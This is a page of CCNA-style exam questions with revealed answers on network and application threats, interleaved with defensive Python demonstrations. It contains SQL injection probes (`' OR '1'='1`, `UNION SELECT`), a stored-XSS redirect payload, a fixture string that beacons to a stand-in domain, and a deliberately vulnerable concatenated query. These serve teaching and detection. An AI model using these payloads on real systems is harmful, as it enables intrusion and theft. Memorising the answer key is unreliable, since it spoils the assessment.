CCNA Threats Vulnerabilities Questions

75 of 265 questions · Page 3/4 · Threats Vulnerabilities topic · Answers revealed

151
MCQ · easy

A support portal searches customer records by last name. When a tester enters a single quote into the search field, the application returns a database syntax error. Which attack is most likely possible?

A. SQL injection, because the input may be altering the database query
B. Cross-site scripting, because the page is executing malicious JavaScript in the browser
C. Server-side request forgery, because the server is making internal network calls
D. Cross-site request forgery, because the user is being tricked into submitting a form
Answer: A

A quote causing a database syntax error is a classic sign that user input may be breaking SQL queries.

Why this answer

The single quote character is a common SQL injection test payload. When it triggers a database syntax error, it confirms that the input is being directly concatenated into a SQL query without proper sanitization or parameterization. This allows an attacker to break out of the intended query structure and execute arbitrary SQL commands, making SQL injection the most likely attack.

Exam trap

The trap here is that candidates may confuse a database syntax error with a client-side script error, leading them to choose cross-site scripting, but the error message originates from the database server, not the browser.

How to eliminate wrong answers

Option B is wrong because cross-site scripting (XSS) requires the application to reflect or store user input as executable JavaScript in the browser, not cause a server-side database syntax error. Option C is wrong because server-side request forgery (SSRF) involves the server making unintended HTTP requests to internal resources, not manipulating database queries. Option D is wrong because cross-site request forgery (CSRF) tricks an authenticated user into submitting a malicious request, but the error here is a direct database syntax error from input, not a forged request from another site.

152
Multi-Select · hard

A scan returns five findings. Which two should be remediated first based on real-world risk? Select two. A) Internet-facing SSO gateway, CVSS 8.8, public exploit code, and auth bypass impact. B) Internal print server, CVSS 9.8, no known exploit, isolated VLAN, no sensitive data. C) File server with regulated customer records, CVSS 6.5, active exploitation in the wild, reachable from VPN. D) Lab hypervisor, CVSS 7.5, no exploit, scheduled retirement next month, used only by testers. E) Dev wiki, CVSS 5.0, no exploit, no sensitive data.

Select 2 answers
A. Internet-facing SSO gateway with public exploit code and authentication-bypass impact.
B. Internal print server on an isolated VLAN with no known exploit and no sensitive data.
C. File server containing regulated customer records, with active exploitation in the wild and VPN reachability.
D. Lab hypervisor that is scheduled for retirement next month and used only by testers.
E. Development wiki with low severity, no exploit, and no sensitive data.
Answers: A, C

This is a top-priority remediation because the system is internet-facing, has publicly available exploit code, and can lead to authentication bypass. In practice, exposure and exploitability often outweigh CVSS alone because a compromised SSO service can become a foothold for broad lateral movement and account takeover across many systems.

Why this answer

Option A is correct because the SSO gateway is internet-facing, has a CVSS 8.8 with public exploit code, and an authentication-bypass impact. This combination means an attacker can gain unauthorized access to all federated applications without credentials, representing a critical risk that must be remediated immediately.

Exam trap

The trap here is that candidates often prioritize the highest CVSS score (9.8) without considering compensating controls like network isolation, lack of exploit code, or data sensitivity, which can drastically reduce real-world risk.
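The ranking logic this question tests can be made concrete. The following is an added example, not part of the question bank or any Cisco material: it encodes the five findings and scores them with a simple exposure-aware adjustment to the CVSS base score. The weights, field names and the `Finding` record are assumptions chosen for illustration, not a published standard.

```python
# Added example (not from the question bank): rank scan findings by
# exposure-aware risk rather than CVSS alone. The weights are assumptions
# chosen for illustration; a real program would tune them to its environment.
from dataclasses import dataclass


@dataclass
class Finding:
    name: str
    cvss: float
    internet_facing: bool = False
    vpn_reachable: bool = False
    public_exploit: bool = False
    active_exploitation: bool = False
    high_impact_data: bool = False   # regulated records, or auth bypass on SSO
    isolated: bool = False
    retiring_soon: bool = False


def risk_score(f: Finding) -> float:
    """CVSS base score adjusted by exposure, exploitability and compensating controls."""
    score = f.cvss
    if f.internet_facing:
        score += 3.0      # reachable by anyone on the internet
    if f.vpn_reachable:
        score += 2.0      # reachable by any VPN user
    if f.active_exploitation:
        score += 4.0      # being exploited in the wild right now
    if f.public_exploit:
        score += 3.0      # working exploit code is available
    if f.high_impact_data:
        score += 2.0      # compromise exposes regulated data or many systems
    if f.isolated:
        score -= 2.0      # compensating control: segmented VLAN
    if f.retiring_soon:
        score -= 1.0      # short remaining exposure window
    return score


# The five findings from the question, encoded as constructed records.
FINDINGS = [
    Finding("A", 8.8, internet_facing=True, public_exploit=True, high_impact_data=True),
    Finding("B", 9.8, isolated=True),
    Finding("C", 6.5, vpn_reachable=True, active_exploitation=True, high_impact_data=True),
    Finding("D", 7.5, retiring_soon=True),
    Finding("E", 5.0),
]


def prioritize(findings):
    """Return findings ordered from highest to lowest adjusted risk."""
    return sorted(findings, key=risk_score, reverse=True)


def top_n(findings, n=2):
    """Names of the n findings to remediate first."""
    return [f.name for f in prioritize(findings)[:n]]


if __name__ == "__main__":
    for f in prioritize(FINDINGS):
        print(f"{f.name}: cvss={f.cvss} adjusted={risk_score(f):.1f}")
```

With these weights the print server's 9.8 drops below the SSO gateway and the actively exploited file server, which is the point of the question: isolation and absence of exploit code are compensating factors that a raw CVSS sort ignores.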

153
MCQ · medium

NetFlow shows one user workstation making authenticated SMB and WinRM connections to more than 40 internal hosts within 15 minutes, starting shortly after the user opened a spreadsheet attachment. No approved admin tool was running on the device. What is the best initial response?

A. Treat the traffic as normal because the workstation used valid credentials
B. Isolate the workstation and begin investigating for credential compromise or lateral movement
C. Increase the DHCP lease time to reduce network noise
D. Block all SMB and WinRM traffic across the entire enterprise
Answer: B

Rapid east-west access from a single workstation is a strong sign of compromise, so containment and investigation should start immediately.

Why this answer

The sudden burst of authenticated SMB and WinRM connections from a single workstation to over 40 internal hosts immediately after opening a spreadsheet attachment is a classic indicator of lateral movement using stolen credentials. Since no approved admin tool was running, this behavior strongly suggests the user's credentials have been compromised, likely via a macro or exploit in the attachment, and an attacker is using those protocols to move laterally. Isolating the workstation stops the attack in progress and preserves evidence for forensic investigation.

Exam trap

The trap here is that candidates see 'authenticated' and assume the traffic is legitimate, missing that attackers use valid stolen credentials to authenticate, making authentication alone an unreliable indicator of safety.

How to eliminate wrong answers

Option A is wrong because valid credentials do not make the traffic normal; attackers commonly use stolen credentials to authenticate and move laterally, so authentication alone does not indicate legitimate activity. Option C is wrong because increasing the DHCP lease time does not address the security incident; it would only extend IP address assignments and has no effect on SMB/WinRM lateral movement. Option D is wrong because blocking all SMB and WinRM traffic enterprise-wide would disrupt legitimate administrative and file-sharing operations, and is an overly broad, reactive measure that does not isolate the specific compromised host or investigate the root cause.

154
MCQ · medium

After a routine dependency update, a development team notices that the customer portal begins making outbound connections to an unfamiliar domain during startup. The domain is not part of the application design, and the behavior started immediately after the third-party library was updated. Which threat is most likely?

A. Supply-chain compromise
B. Evil twin access point
C. Bluetooth pairing abuse
D. DNS poisoning on the client network
Answer: A

A compromised dependency can introduce malicious behavior through trusted software updates or packages.

Why this answer

The scenario describes a supply-chain compromise, where a trusted third-party library has been maliciously altered to include unauthorized outbound connections. This is a classic software supply-chain attack, as the dependency update introduced code that phones home to an unfamiliar domain, indicating the library's integrity was compromised before or during distribution.

Exam trap

The trap here is that candidates may confuse supply-chain compromise with DNS poisoning, because both involve unexpected outbound connections, but DNS poisoning would affect all network traffic and not be tied to a specific library update.

How to eliminate wrong answers

Option B (Evil twin access point) is wrong because it involves a rogue Wi-Fi access point impersonating a legitimate one to intercept network traffic, which is unrelated to a dependency update triggering outbound connections. Option C (Bluetooth pairing abuse) is wrong because it exploits Bluetooth vulnerabilities for unauthorized access or data exfiltration, not relevant to a third-party library update causing outbound connections. Option D (DNS poisoning on the client network) is wrong because it corrupts DNS cache to redirect traffic to malicious sites, but the behavior started immediately after the library update and targets a specific domain, not a broad redirection of all traffic.

155
MCQ · medium

SIEM alerts show one workstation making SMB connections to 30 internal hosts within 10 minutes, followed by remote service creation and repeated access attempts to admin shares. The workstation also begins authenticating with several privileged accounts. What is the most likely activity?

A. A distributed denial-of-service attack launched from a compromised internal host.
B. DNS tunneling used to exfiltrate data through allowed name-resolution traffic.
C. ARP spoofing to redirect local traffic at the network layer.
D. Lateral movement after credential compromise or endpoint takeover.
Answer: D

The workstation is behaving like an attacker foothold that is probing internal systems, using administrative shares, and attempting remote service creation. Those are strong signs of lateral movement after credentials or the device itself have been compromised. The privileged-account authentication attempts also suggest the attacker is trying to expand access and reach higher-value systems inside the environment.

Why this answer

The sequence of SMB connections to many internal hosts, followed by remote service creation and repeated access attempts to admin shares, combined with authentication using privileged accounts, is the classic pattern of lateral movement. This indicates the attacker has already compromised the workstation (endpoint takeover) or obtained valid credentials and is now using SMB and PsExec-like techniques to move laterally across the network, escalate privileges, and establish persistence.

Exam trap

The trap here is that candidates may confuse lateral movement with a DDoS attack because of the many outbound connections, but the key differentiator is the use of admin shares and privileged account authentication, which are hallmarks of post-exploitation lateral movement, not volumetric attacks.

How to eliminate wrong answers

Option A is wrong because a DDoS attack would generate massive traffic to overwhelm a target, not involve targeted SMB connections to admin shares or privileged account authentication. Option B is wrong because DNS tunneling exfiltrates data by encoding it in DNS queries/responses, not by making SMB connections or creating remote services. Option C is wrong because ARP spoofing operates at Layer 2 to intercept traffic on a local subnet, not to perform SMB-based lateral movement or authenticate with multiple privileged accounts across many hosts.
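Questions 153 and 155 both rest on the same detection idea: one source reaching an unusually large number of distinct internal hosts over administrative protocols inside a short window. The following is an added example, not part of the question bank or any vendor tool: it parses constructed NetFlow-style records and raises an alert when a single source touches at least a threshold of distinct hosts on SMB or WinRM ports within a sliding 15-minute window. The record format, port list, threshold and sample flows are all assumptions.

```python
# Added example (not from the question bank): flag a single source that
# reaches many distinct internal hosts over admin protocols in a short window.
# Flow format, thresholds and sample records are constructed assumptions.
from collections import defaultdict
from datetime import datetime, timedelta

ADMIN_PORTS = {445: "SMB", 5985: "WinRM", 5986: "WinRM-HTTPS"}


def parse_flow(line):
    """Parse 'ISO-timestamp src dst dst_port' into typed fields."""
    ts, src, dst, port = line.split()
    return datetime.fromisoformat(ts), src, dst, int(port)


def fan_out_alerts(lines, window=timedelta(minutes=15), threshold=20):
    """Return {src: max distinct admin-protocol destinations seen in any window}.

    Only sources that reach the threshold appear in the result.
    """
    by_src = defaultdict(list)
    for line in lines:
        ts, src, dst, port = parse_flow(line)
        if port in ADMIN_PORTS:
            by_src[src].append((ts, dst))

    alerts = {}
    for src, events in by_src.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            # Advance the window start until the span is at most `window`.
            while events[end][0] - events[start][0] > window:
                start += 1
            distinct = {dst for _, dst in events[start:end + 1]}
            if len(distinct) >= threshold:
                alerts[src] = max(alerts.get(src, 0), len(distinct))
    return alerts


# Constructed sample: one workstation sweeps 45 hosts in about 11 minutes,
# an admin host touches 5 hosts over about 100 minutes, one HTTPS flow is noise.
_base = datetime(2024, 5, 1, 9, 0, 0)
SAMPLE_FLOWS = [
    f"{(_base + timedelta(seconds=15 * i)).isoformat()} 10.1.5.23 10.1.7.{i + 1} "
    f"{445 if i % 2 == 0 else 5985}"
    for i in range(45)
]
SAMPLE_FLOWS += [
    f"{(_base + timedelta(minutes=25 * i)).isoformat()} 10.1.9.9 10.1.8.{i + 1} 445"
    for i in range(5)
]
SAMPLE_FLOWS.append(f"{_base.isoformat()} 10.1.5.50 93.184.216.34 443")

if __name__ == "__main__":
    for src, count in fan_out_alerts(SAMPLE_FLOWS).items():
        print(f"ALERT {src}: {count} distinct hosts over admin ports inside 15 min")
```

The admin host is not flagged because its five connections are spread over more than an hour; the rate of distinct destinations, not the use of valid credentials, is what separates the two. In a real deployment the alert would be joined with endpoint events (remote service creation, admin-share access) before isolating the host.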

156
MCQ · medium

An EDR console shows `mshta.exe` launching `powershell.exe` from a user profile directory, followed by a script that never writes a new executable to disk. Minutes later, the host begins making regular outbound HTTPS connections to an unfamiliar IP address. What type of malware behavior is most likely being observed?

A. Fileless attack
B. Ransomware
C. Worm
D. Rootkit
Answer: A

Fileless attacks rely on built-in tools and memory-resident activity instead of dropping a traditional executable on disk. The use of mshta and PowerShell is a common indicator.

Why this answer

The EDR console shows mshta.exe (a Microsoft binary for executing HTML Applications) launching PowerShell from a user profile directory, followed by a script that never writes a new executable to disk. This is classic fileless malware behavior, where the malicious payload runs entirely in memory (e.g., via PowerShell or .NET reflection) without dropping a file, making it harder for traditional signature-based antivirus to detect. The subsequent outbound HTTPS connections to an unfamiliar IP indicate command-and-control (C2) communication, consistent with a fileless attack that persists only in memory.

Exam trap

The trap here is that candidates may confuse 'fileless' with 'no malware at all' or think it must involve a rootkit, but the key indicator is the absence of a file write combined with in-memory script execution via trusted system binaries.

How to eliminate wrong answers

Option B (Ransomware) is wrong because ransomware typically encrypts files and demands payment, often writing a ransom note to disk and modifying file extensions; the described behavior of never writing an executable to disk and making outbound HTTPS connections is more indicative of a fileless C2 channel, not encryption or extortion. Option C (Worm) is wrong because worms self-propagate across networks without user interaction, often exploiting vulnerabilities or using removable media; the scenario focuses on a single host's in-memory execution and C2 traffic, not lateral movement or replication. Option D (Rootkit) is wrong because rootkits are designed to hide their presence by modifying the operating system kernel or system calls, often persisting via drivers or bootkits; the described behavior of launching PowerShell from mshta.exe and making outbound connections is a user-mode fileless attack, not a kernel-level stealth mechanism.
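The indicators in this question (a script host spawning PowerShell from a user-writable directory, then outbound connections to an unfamiliar address) can be expressed as a correlation rule. The following is an added example, not part of the question bank or any EDR product: it walks constructed process and network events, flags the parent-child chain, and then flags any outbound connection from the same host to an address outside an allowlist within 30 minutes. The event shape, binary lists, allowlist and sample events are assumptions.

```python
# Added example (not from the question bank): correlate an EDR process-tree
# event with later outbound connections. Event shape, binary lists and
# sample data are constructed assumptions.
import ntpath
from datetime import datetime, timedelta

SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe", "rundll32.exe"}
SCRIPT_ENGINES = {"powershell.exe", "pwsh.exe"}


def is_user_profile_path(path):
    """True for paths inside the C:/Users profile tree, where a user can write."""
    return path.lower().replace("/", "\\").startswith("c:\\users\\")


def detect_fileless_chain(events, known_ips, window=timedelta(minutes=30)):
    """Return (host, kind, detail) alerts for script-host -> script-engine launches
    and for outbound connections to unknown IPs that follow within `window`."""
    suspicious_start = {}  # host -> timestamp of the suspicious launch
    alerts = []
    for e in sorted(events, key=lambda e: e["ts"]):
        if e["type"] == "process":
            parent = ntpath.basename(e["parent"]).lower()
            child = ntpath.basename(e["image"]).lower()
            if (parent in SCRIPT_HOSTS and child in SCRIPT_ENGINES
                    and is_user_profile_path(e["cwd"])):
                suspicious_start[e["host"]] = e["ts"]
                alerts.append((e["host"], "lolbin-chain",
                               f"{parent} -> {child} in {e['cwd']}"))
        elif e["type"] == "network":
            start = suspicious_start.get(e["host"])
            if (start is not None and e["ts"] - start <= window
                    and e["dst_ip"] not in known_ips):
                alerts.append((e["host"], "possible-c2", e["dst_ip"]))
    return alerts


KNOWN_IPS = {"10.0.0.5", "10.0.0.6"}  # constructed allowlist of internal services
_t = datetime(2024, 5, 1, 10, 0, 0)
SAMPLE_EVENTS = [
    {"ts": _t, "host": "WS01", "type": "process",
     "parent": r"C:\Windows\System32\mshta.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cwd": r"C:\Users\jdoe\AppData\Local\Temp"},
    {"ts": _t + timedelta(minutes=4), "host": "WS01", "type": "network",
     "dst_ip": "198.51.100.7"},
    {"ts": _t + timedelta(minutes=5), "host": "WS01", "type": "network",
     "dst_ip": "10.0.0.5"},
    # Benign admin activity on another host: Explorer launches PowerShell from System32.
    {"ts": _t, "host": "WS02", "type": "process",
     "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cwd": r"C:\Windows\System32"},
    {"ts": _t + timedelta(minutes=2), "host": "WS02", "type": "network",
     "dst_ip": "198.51.100.9"},
]

if __name__ == "__main__":
    for host, kind, detail in detect_fileless_chain(SAMPLE_EVENTS, KNOWN_IPS):
        print(f"{host}: {kind}: {detail}")
```

WS02's outbound connection is not flagged on its own: the rule fires on the chain, and only then treats later unknown destinations from that host as candidate C2. That ordering keeps the rule from alerting on every unfamiliar IP in the environment.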

157
MCQ · medium

A file server suddenly shows renamed files with a new extension, users see a ransom note demanding cryptocurrency, and shadow copies are deleted from the host. Which malware family is the best match?

A. Ransomware, because the attacker is encrypting data and demanding payment to restore access.
B. Trojan, because the attack requires a disguised program to install itself.
C. Spyware, because the attacker is likely trying to monitor file activity.
D. Logic bomb, because the malware likely triggered after a specific condition was met.
Answer: A

Ransomware commonly encrypts files, renames them, deletes recovery points, and leaves a payment demand. The combination of locked data and a ransom note is a strong indicator of this malware family.

Why this answer

Ransomware is the correct classification because the scenario describes file encryption (renamed files with new extensions), a ransom note demanding cryptocurrency, and the deletion of shadow copies (Volume Shadow Copy Service snapshots) to prevent file recovery. These are hallmark behaviors of ransomware, specifically crypto-ransomware, which encrypts data and demands payment for decryption keys.

Exam trap

The trap here is that candidates may confuse ransomware with a Trojan because both can be delivered via social engineering, but the defining behaviors of file encryption, ransom note, and shadow copy deletion are unique to ransomware, not generic malware types.

How to eliminate wrong answers

Option B is wrong because a Trojan is a type of malware that disguises itself as legitimate software to gain access, but it does not inherently perform file encryption or demand ransom; the described behaviors are specific to ransomware, not Trojans. Option C is wrong because spyware is designed to monitor user activity and steal information without the user's knowledge, not to encrypt files or display ransom notes; the deletion of shadow copies and file renaming are not spyware characteristics. Option D is wrong because a logic bomb is a piece of code that executes malicious actions when a specific condition is met (e.g., date or user action), but it does not typically involve file encryption, ransom notes, or cryptocurrency demands; the scenario lacks any trigger condition and instead shows active encryption and extortion.

158
MCQ · medium

A web application lets users save a profile "display name." One employee enters a value that contains script code, and later other users who view that profile start seeing pop-ups and redirects to a fake login page. Which attack is most likely occurring?

A. SQL injection, because the database is being queried with unsafe concatenated input.
B. Cross-site scripting, because untrusted content is executed in another user's browser context.
C. Cross-site request forgery, because the attacker is forcing the victim to submit a form automatically.
D. Broken authentication, because the login system is failing to verify usernames correctly.
Answer: B

Cross-site scripting occurs when attacker-supplied input is rendered as active script, allowing redirects, pop-ups, and credential theft in other users' sessions.

Why this answer

Option B is correct because the employee's display name containing script code is stored in the database and later rendered in the browsers of other users without proper sanitization. This is a classic stored cross-site scripting (XSS) attack, where untrusted user input is executed as HTML/JavaScript in the context of another user's session, leading to pop-ups and redirects to a fake login page.

Exam trap

The trap here is that candidates may confuse stored XSS with SQL injection because both involve database storage, but the key distinction is that XSS executes client-side scripts in another user's browser, whereas SQL injection manipulates server-side queries.

How to eliminate wrong answers

Option A is wrong because SQL injection involves manipulating database queries through unsafe concatenation of input, but the described behavior (pop-ups and redirects in other users' browsers) is a client-side script execution, not a server-side database manipulation. Option C is wrong because cross-site request forgery (CSRF) forces a victim to submit a forged request, but the attack here involves script execution in the browser, not unauthorized form submissions. Option D is wrong because broken authentication refers to flaws in login verification or session management, whereas the issue is that untrusted content is executed in the browser, not that authentication is bypassed.
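The defect behind stored XSS is output rendering, so the fix is best shown at the rendering step. The following is an added example, not part of the question bank: it renders the same profile page twice, once by inserting the stored display name verbatim and once with HTML output encoding, and adds an input allowlist as defence in depth. The payload, template, allowlist pattern and the rough `contains_active_markup` check are all constructed assumptions.

```python
# Added example (not from the question bank): the same profile page rendered
# with raw interpolation and with HTML output encoding. The payload, template
# and allowlist are constructed assumptions.
import html
import re

# Constructed attacker-controlled display name that redirects to a fake login page.
PAYLOAD = '<script>location="https://login.example.test/"</script>'

# Defence in depth (assumption): a display name needs only letters, digits,
# spaces and a few punctuation marks; anything else is rejected at save time.
DISPLAY_NAME_RE = re.compile(r"^[\w .'\-]{1,40}$")


def validate_display_name(name):
    """Allowlist check applied when the profile is saved."""
    return DISPLAY_NAME_RE.fullmatch(name) is not None


def render_profile_unsafe(display_name):
    """Vulnerable: stored input is inserted into HTML verbatim."""
    return f"<h1>Profile: {display_name}</h1>"


def render_profile_safe(display_name):
    """Hardened: escape at output time so the browser shows text, not markup."""
    return f"<h1>Profile: {html.escape(display_name, quote=True)}</h1>"


# Rough detector used only to show the difference between the two renderers.
ACTIVE_MARKUP = re.compile(r"<script|<iframe|\son\w+\s*=|javascript:", re.IGNORECASE)


def contains_active_markup(rendered):
    return ACTIVE_MARKUP.search(rendered) is not None


if __name__ == "__main__":
    print("unsafe :", render_profile_unsafe(PAYLOAD))
    print("safe   :", render_profile_safe(PAYLOAD))
    print("accepted at save time?", validate_display_name(PAYLOAD))
```

Output encoding is the control that actually removes the vulnerability; the allowlist reduces what reaches storage but would not protect other fields or other output contexts (attributes, URLs, JavaScript), each of which needs its own encoder.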

159
MCQ · medium

Several employees in a branch office report that their laptops automatically connected to a network named "CorpWiFi" even though they were away from the office. Shortly afterward, a few users saw a captive portal asking them to re-enter company credentials. Which threat best explains this situation?

A. Evil twin access point impersonating the legitimate wireless network
B. Bluetooth pairing abuse from a nearby device
C. DNS poisoning caused by a compromised resolver
D. NFC relay attack against the laptops' login process
Answer: A

An evil twin is a rogue access point configured to look like the trusted wireless network, often using the same or a very similar SSID. Because clients may auto-connect, attackers can capture credentials or inspect traffic through the fake network. The captive portal and automatic connection away from the office strongly suggest a malicious wireless impersonation setup.

Why this answer

The scenario describes an evil twin attack where a rogue access point broadcasts the SSID "CorpWiFi" to trick laptops into automatically connecting. Once connected, the attacker presents a fake captive portal to harvest credentials. This exploits the fact that client devices often prioritize known SSIDs without verifying the authenticity of the access point, relying solely on the network name.

Exam trap

The trap here is that candidates may confuse an evil twin with a rogue AP that requires manual connection, but the key detail is the automatic connection, which exploits the client's saved network profile, not just the presence of a malicious AP.

How to eliminate wrong answers

Option B is wrong because Bluetooth pairing abuse requires active pairing or discovery, not automatic connection to a Wi-Fi network, and does not involve a captive portal for credential harvesting. Option C is wrong because DNS poisoning would redirect traffic to malicious sites after connection, but it does not explain why laptops automatically connected to a network named "CorpWiFi" away from the office. Option D is wrong because NFC relay attacks require physical proximity (typically centimeters) and are used for contactless payment or access card cloning, not for connecting to Wi-Fi networks or presenting a captive portal.

160
MCQ · easy

Based on the exhibit, which supply-chain threat is most likely?

A. Dependency compromise
B. Brute-force attack
C. SQL injection
D. Privilege escalation
Answer: A

The application began contacting an unfamiliar domain immediately after a dependency update, and the package came from a newly created repository account. That strongly suggests dependency compromise, a supply-chain issue where a trusted library has been replaced or altered with malicious behavior.

Why this answer

The exhibit shows a dependency on a third-party library (e.g., a JavaScript package from a CDN or a software component from an external repository). A dependency compromise occurs when an attacker injects malicious code into that trusted third-party component, which is then pulled into the organization's environment during updates or builds. This is the most likely supply-chain threat because it directly exploits the trust placed in external dependencies.

Exam trap

Cisco often tests the distinction between supply-chain attacks (compromising a trusted third-party component) and direct attacks on the organization's own systems; the trap here is that candidates may confuse a dependency compromise with a brute-force attack or SQL injection because they all involve unauthorized access, but the key difference is the vector: the dependency is externally sourced and trusted.

How to eliminate wrong answers

Option B (Brute-force attack) is wrong because it targets authentication mechanisms (e.g., SSH, RDP) by guessing credentials, not the integrity of third-party components in the supply chain. Option C (SQL injection) is wrong because it exploits improper input validation in database queries, not the trust relationship with external dependencies. Option D (Privilege escalation) is wrong because it involves gaining elevated access within a system after initial compromise, not the initial infiltration via a compromised dependency.

161
MCQ · easy

A development team updates a third-party software library used by its web application. After the release, new deployments begin making unexpected outbound connections to an unfamiliar domain. What type of threat is most likely?

A. Dependency compromise
B. Phishing
C. Rootkit infection
D. Password spraying
Answer: A

Dependency compromise happens when a trusted third-party library, package, or component is altered to include malicious behavior. The unusual outbound connections after an update are a strong sign that the dependency may have been tampered with.

Why this answer

The correct answer is A, dependency compromise. This scenario describes a supply chain attack where a third-party library has been maliciously altered or replaced, causing the web application to make unauthorized outbound connections to an attacker-controlled domain. Such compromises often occur when developers unknowingly integrate a tampered version of a library from a compromised repository or via a typosquatting attack, leading to data exfiltration or command-and-control (C2) communication.

Exam trap

The trap here is that candidates may confuse a dependency compromise with a rootkit infection (Option C) because both involve stealthy, unauthorized behavior, but a rootkit specifically targets the OS kernel, not a web application's third-party library.

How to eliminate wrong answers

Option B is wrong because phishing is a social engineering attack that tricks users into revealing credentials or installing malware via deceptive emails or messages, not a technical compromise of a software library. Option C is wrong because a rootkit infection is a type of malware that hides its presence and provides persistent, stealthy access to an operating system, not a supply chain attack on a web application's dependencies. Option D is wrong because password spraying is a brute-force attack that attempts a few common passwords against many accounts, not a method to alter a third-party library's behavior.
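Questions 154, 160 and 161 describe the same event from the defender's side: a dependency update that silently changes behaviour. Two build-time checks catch this before deployment, and the following is an added example of them, not part of the question bank or any package manager: verifying a downloaded archive against the hash pinned in a lockfile, and flagging registry metadata such as a newly created publisher account (the detail in question 160) or a changed maintainer set. Package names, archive bytes, the lockfile and the publisher dates are constructed assumptions.

```python
# Added example (not from the question bank): two build-time checks that catch
# a tampered dependency before it reaches a deployment. Package names, archive
# bytes, the lockfile and the publisher metadata are constructed assumptions.
import hashlib
from datetime import date

# Archive bytes as reviewed when the version was pinned, and a later copy with
# an added call-home string (both constructed).
GOOD_ARCHIVE = b"widget-lib-1.2.3 source tree"
TAMPERED_ARCHIVE = GOOD_ARCHIVE + b"\nfetch('https://unfamiliar.example/beacon')"

# Lockfile recorded at pin time: package -> sha256 of the reviewed archive.
LOCKFILE = {"widget-lib": hashlib.sha256(GOOD_ARCHIVE).hexdigest()}


def verify_artifact(name, data, lockfile=LOCKFILE):
    """Return 'ok', 'hash-mismatch' or 'unpinned' for a downloaded archive."""
    expected = lockfile.get(name)
    if expected is None:
        return "unpinned"          # never reviewed: do not install silently
    actual = hashlib.sha256(data).hexdigest()
    return "ok" if actual == expected else "hash-mismatch"


def publisher_flags(account_created, released_on, maintainers_before,
                    maintainers_now, min_account_age_days=30):
    """Registry-metadata heuristics: a brand-new publishing account or a
    changed maintainer set deserves human review before the update is accepted."""
    flags = []
    if (released_on - account_created).days < min_account_age_days:
        flags.append("new-publisher-account")
    if set(maintainers_now) != set(maintainers_before):
        flags.append("maintainer-change")
    return flags


if __name__ == "__main__":
    print("reviewed copy :", verify_artifact("widget-lib", GOOD_ARCHIVE))
    print("updated copy  :", verify_artifact("widget-lib", TAMPERED_ARCHIVE))
    print("publisher     :", publisher_flags(date(2024, 4, 28), date(2024, 5, 1),
                                             {"alice"}, {"newacct"}))
```

The hash check is exact but only as good as the review that produced the pin; the metadata check is heuristic but catches the case where a legitimate-looking new version was published by someone who did not previously control the package. Together they turn "the app started talking to a strange domain after an update" from a post-deployment surprise into a blocked build.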

162
MCQ · medium

During testing, entering `' OR '1'='1` into a login field returns all user records instead of rejecting the input. What is the best fix to address this flaw?

A. Add client-side JavaScript validation to block quote characters
B. Use parameterized queries or prepared statements for database access
C. Store passwords in a stronger hash format
D. Change the login page to HTTPS
Answer: B

Parameterized queries separate code from data, which prevents SQL injection even when attackers supply special characters.

Why this answer

Option B is correct because the flaw is a classic SQL injection vulnerability, where unsanitized user input is concatenated directly into a SQL query. Parameterized queries (prepared statements) separate SQL logic from data, ensuring that input like ' OR '1'='1 is treated as a literal string value, not executable code. This is the industry-standard mitigation per OWASP and effectively prevents injection attacks.

Exam trap

The trap here is that candidates often confuse input validation (like blocking quotes) with the proper defense of parameterized queries, not realizing that blacklisting characters is ineffective and that the correct fix is to use prepared statements to separate code from data.

How to eliminate wrong answers

Option A is wrong because client-side JavaScript validation can be easily bypassed by disabling JavaScript or using tools like Burp Suite to send raw HTTP requests, so it provides no real security against SQL injection. Option C is wrong because stronger password hashing (e.g., bcrypt, Argon2) addresses credential storage security, not the SQL injection vulnerability that allows an attacker to extract all records without needing passwords. Option D is wrong because HTTPS encrypts data in transit but does not prevent the server from executing malicious SQL commands; the injection occurs after decryption on the server side.

163
MCQ · medium

After a new search feature goes live, logs show requests containing `UNION SELECT` and the application returns database error messages. Security testing confirms attackers can retrieve rows from other tables by modifying the query string. Which fix is best?

A. Rewrite the database access layer to use parameterized queries or prepared statements.
B. Encode special characters in the browser before submitting the search form.
C. Disable detailed error messages so attackers cannot see the database name.
D. Increase password complexity requirements for all application users.
Answer: A

Parameterized queries separate user input from SQL code, which prevents attacker-controlled strings from changing the query structure. That directly addresses the injection flaw rather than only hiding symptoms. Because the app is already returning database errors and leaking data, the safest fix is to eliminate dynamic SQL construction at the source of the problem.

Why this answer

The attack described is SQL injection, where the attacker uses `UNION SELECT` to extract data from other tables. The most effective and industry-standard fix is to use parameterized queries or prepared statements, which separate SQL logic from user input, preventing the database from interpreting malicious input as executable code. This directly addresses the root cause by ensuring user-supplied data is treated as data, not as part of the SQL command.

Exam trap

The trap here is that candidates often choose to hide error messages (Option C) thinking it stops the attack, but this only obscures the information leakage without fixing the underlying SQL injection flaw, which can still be exploited via blind techniques.

How to eliminate wrong answers

Option B is wrong because encoding special characters in the browser is a client-side measure that can be easily bypassed by attackers sending raw HTTP requests, and it does not prevent server-side SQL injection. Option C is wrong because disabling detailed error messages only hides the symptoms (e.g., database name exposure) but does not prevent the attacker from exploiting the SQL injection vulnerability; they can still extract data via blind SQL injection techniques. Option D is wrong because increasing password complexity does nothing to address the SQL injection vulnerability in the search feature; it is a security control for authentication, not input validation.
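Questions 151, 162 and 163 all turn on the difference between concatenating input into SQL text and binding it as a parameter. The following is an added example, not part of the question bank or any framework: it runs both forms of the same lookup against an in-memory SQLite table, so the three behaviours the questions describe can be observed side by side: a lone quote producing a database syntax error, `' OR '1'='1` returning every row, and the parameterized version treating both inputs as ordinary (non-matching) strings. The table, rows and helper names are constructed.

```python
# Added example (not from the question bank): the concatenated query beside
# its parameterized replacement, run against an in-memory SQLite table so the
# behaviour of each probe can be observed. Table and rows are constructed.
import sqlite3


def setup_db():
    """Constructed users table with two rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password_hash TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", "hash-a"), ("bob", "hash-b")])
    return conn


def find_user_vulnerable(conn, username):
    """Vulnerable: user input becomes part of the SQL text."""
    sql = f"SELECT username FROM users WHERE username = '{username}'"
    return [row[0] for row in conn.execute(sql)]


def find_user_safe(conn, username):
    """Hardened: the driver binds the value; quotes in it are just characters."""
    sql = "SELECT username FROM users WHERE username = ?"
    return [row[0] for row in conn.execute(sql, (username,))]


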